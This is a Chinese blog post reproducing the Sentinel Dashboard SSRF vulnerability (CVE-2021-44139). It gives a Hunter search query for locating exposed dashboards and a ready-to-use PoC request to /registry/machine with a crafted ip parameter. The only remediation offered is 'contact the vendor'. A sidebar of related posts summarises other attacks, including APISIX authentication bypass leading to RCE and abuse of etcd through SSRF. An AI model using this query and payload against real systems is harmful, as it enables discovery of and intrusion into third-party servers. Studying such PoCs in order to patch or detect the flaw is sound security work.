【漏洞复现】Sentinel Dashboard SSRF漏洞(CVE-2021-44139)

于 2024-01-15 09:18:33 发布
阅读量1.1k 收藏 9
点赞数 13
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/135593207
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

Nx01 产品简介

        Sentinel Dashboard是一个轻量级的开源控制台,提供机器发现以及健康情况管理、监控、规则管理和推送的功能。它还提供了详细的被保护资源的实际访问统计情况,以及为不同服务配置的限流规则。

Nx02 漏洞描述

        CVE-2021-44139漏洞主要存在于Sentinel的管控平台Sentinel-dashboard中。当用户访问特定URL时,该漏洞允许恶意用户通过构造的请求绕过认证机制,实施SSRF攻击。

Nx03 产品主页

hunter-query: web.title=="Sentinel Dashboard"

Nx04 漏洞复现

POC:

/registry/machine?app=SSRF-TEST&appType=0&version=0&hostname=TEST&ip=127.0.0.1%23&port=0

Nx05 修复建议

建议联系软件厂商进行处理。

晚风不及你ღ
关注
  • 13
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录

已下架不支持订阅

漏洞复现Sentinel Dashboard默认弱口令漏洞
晚风不及你
01-15 1252
Sentinel Dashboard是一个轻量级的开源控制台,提供机器发现以及健康情况管理、监控、规则管理和推送的功能。它还提供了详细的被保护资源的实际访问统计情况,以及为不同服务配置的限流规则。
红队攻防渗透技术实战流程:云安全之云原生安全:K8s安全etcd Dashboard Configfile漏洞
最新发布
HACKONE的博客
05-22 203
第二种:在打开证书校验选项后,通过本地127.0.0.1:2379可免认证访问Etcd服务,但通过其他地址访问要携带cert进行认证访问,一般配合ssrf或其他利用,较为鸡肋。etcd是master节点的数据库,通过未授权获取token和证书来攻击,etcd的端口是2379:默认通过证书认证,主要存放节点的数据,如一些token和证书。第三种:实战中在安装k8s默认的配置2379只会监听本地,如果访问没设置0.0.0.0暴露,那么也就意味着最多就是本地访问,不能公网访问,只能配合ssrf或其他。
Apache APISIX Dashboard 未经认证访问导致 RCE(CVE-2021-45232)漏洞复现
weixin_56537388的博客
11-09 1271
在 2.10.1 之前的 Apache APISIX Dashboard 中,Manager API 使用了两个框架,并在框架的基础上引入了框架,所有的 API 和认证中间件都是基于框架开发的。但是这些 API 中有 2 个,并且直接使用框架的接口,它们能够绕过身份验证。通过使用这 2 个未经认证的 API 端点,攻击者可以导出和导入任意 Apache APISIX 配置,包括路由器、服务、脚本等,从而导致请求意外 URL (SSRF) 或执行任意 LUA 脚本 (RCE)。docker环境搭建。
CVE-2021-45232 Apache APISIX Dashboard RCE漏洞复现
m0_58596609的博客
01-17 2658
CVE-2021-45232 Apache APISIX Dashboard RCE漏洞复现
Apache APISIX DashboardCVE-2022-24112)命令执行漏洞方式利用
include_voidmain的博客
04-11 7755
0x01 什么是Apache APISIX Dashboard Apache APISIX 是一个动态、实时、高性能的开源 API 网关,提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX 可以帮助企业快速、安全地处理 API 和微服务流量,包括网关、Kubernetes Ingress 和服务网格等。 0x02 漏洞详情 漏洞编号:CVE-2022-24112 影响版本:Apache APISIX < 2.12.1 Apache APIS
Apache APISIX Dashboard 身份验证绕过漏洞CVE-2021-45232)
Adminxe的博客
12-29 3112
0x00 漏洞描述 Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。 CVE-2021-45232 该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的..
Apache APISIX Dashboard 身份验证绕过漏洞CVE-2021-45232)
kukudeshuo的博客
12-30 2786
Apache APISIX Dashboard 身份验证绕过漏洞CVE-2021-45232) 漏洞描述 Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。 CVE编号 CVE-2021-45232 FOFA语句 title="Apache APISIX Dashboard" 影响范围 Apache
sentinel-dashboard-1.8.3
03-22
根据官网1.8.3更改而来的sentinel-dashboard 只需要更改配置application.yml 中的 nacos.address nacos.namespace 即可实现nacos上sentinel的持久化
sentinel-dashboard-1.8.3官网资源
08-18
"sentinel-dashboard-1.8.3官网资源"指的是Sentinel的1.8.3版本控制台的资源包,这个资源包中包含的主要组件是(sentinel-dashboard-1.8.3.jar),这是Sentinel Dashboard的可执行jar文件。 Sentinel Dashboard 是 ...
sentinel-dashboard-1.7.0.jar包的下载
07-21
sentinel-dashboard-1.7.0.jar ...1. java -Dserver.port=8080 -Dcsp.sentinel.dashboard.server=localhost:8080 -Dproject.name=sentinel-dashboard -jar sentinel-dashboard.jar 2. 打开 localhost:8080
sentinel-dashboard-1.8.6.jar
01-17
sentinel安装包
sentinel:超级秘密的尖端间谍工具
03-30
哨兵 Sentinel是用于反间谍任务的绝密超精密CIA工具。 在高级技术人员的手中,哨兵可以用来收集和分析有关边界内敌国情报活动的宝贵信息。 安装 长生不老药 要在本地环境上安装Elixir,可以使用。 要安装此项目正在使用的版本,可以使用asdf install命令。 应用 要安装此项目的依赖项,请运行mix deps.get 。 要启动Sentinel,只需在尖端间谍设备(又称计算机)的命令行中运行mix run --no-halt 。 运行mix test以检查这台出色的设备是否已正确校准并准备就绪。 功能性 Sentinel首次运行时,将获取有关其目标的信息并进行解析。 Sentinel还将在内存中缓存已解析的信息,以避免过多显示自身并引起对其活动的怀疑。 该信息将每两个小时刷新一次,以跟踪最新的超级可疑评论。 如果目标的反情报(两次,是)会识别并放下Sentinel,则所
sentinel-dashboard-1.7.1
06-01
安装 Sentinel Dashboard 首先需要下载对应的版本,例如 sentinel-dashboard-1.7.1.jar。然后通过命令行运行 `java -jar sentinel-dashboard-1.7.1.jar` 启动服务。默认监听 8080 端口,可以通过配置参数 `-Dserver...
Apache APISIX Dashboard 未授权访问漏洞CVE-2021-45232)
Bird&Bird
03-13 687
Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的。但是有些 API 直接使用了框架 gin 的接口,从而绕
Apache APISIX Dashboard 未授权访问漏洞公告(CVE-2021-45232)
ApacheAPISIX的博客
12-29 2538
在 Apache APISIX Dashboard 2.7-2.10 版本中出现了未经授权访问的安全漏洞,现将处理信息进行相关公告。
关于Kubernetes Dashboard漏洞CVE-2018-18264的修复公告
weixin_33806300的博客
01-08 432
阿里云容器服务Kubernetes 已修复Dashboard漏洞CVE-2018-18264,本文介绍该漏洞的影响版本及解决方法。阿里云容器服务Kubernetes内建的Kubernetes Dashboard是托管形态且已进行过安全增强,不受此漏洞影响。 背景信息 Kubernetes社区发现Kubernetes Dashboard安全漏洞CVE-20...
Apache APISIX Dashboard 身份验证绕过漏洞风险提示
m0_58596609的博客
12-29 351
CVE-2021-45232 Apache APISIX Dashboard 身份验证绕过漏洞风险提示
复现与代码分析】Apache APISIX Dashboard API权限绕过导致RCE(CVE-2021-45232)
weixin_45694388的博客
04-24 1289
API接口未授权访问一直以来都是令甲方安全人员头疼的问题,在《OWASP API Security Top 10 2019》里面,Broken Object Level Authorization(失效的对象级授权),包括未授权、越权访问等,就是排在第一位的安全问题:未授权漏洞的出现频率越来越高,且漏洞的利用又相对简单,今后应针对这个方向的漏洞多做积累,多做总结。
java -jar sentinel-dashboard-1.7.2.jar
09-21
java -jar sentinel-dashboard-1.7.2.jar是启动Sentinel的命令。Sentinel是一个流量卫兵,用于监控和保护分布式系统中的流量。通过执行这个命令,你可以启动Sentinel的仪表盘,仪表盘是一个jar包,可以直接通过java命令启动。默认情况下,仪表盘会在8080端口上运行。如果你想要更改端口,可以使用java -Dserver.port命令来指定不同的端口,例如java -Dserver.port=9191 -jar sentinel-dashboard-1.7.2.jar。另外,你也可以从Sentinel的官方网站下载sentinel-dashboard-1.7.2.jar,并通过java -jar命令启动,例如java -jar .\sentinel-dashboard-1.7.2.jar。如果你想要将端口设置为8888,可以使用--server.port=8888参数,例如java -jar .\sentinel-dashboard-1.7.2.jar --server.port=8888。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值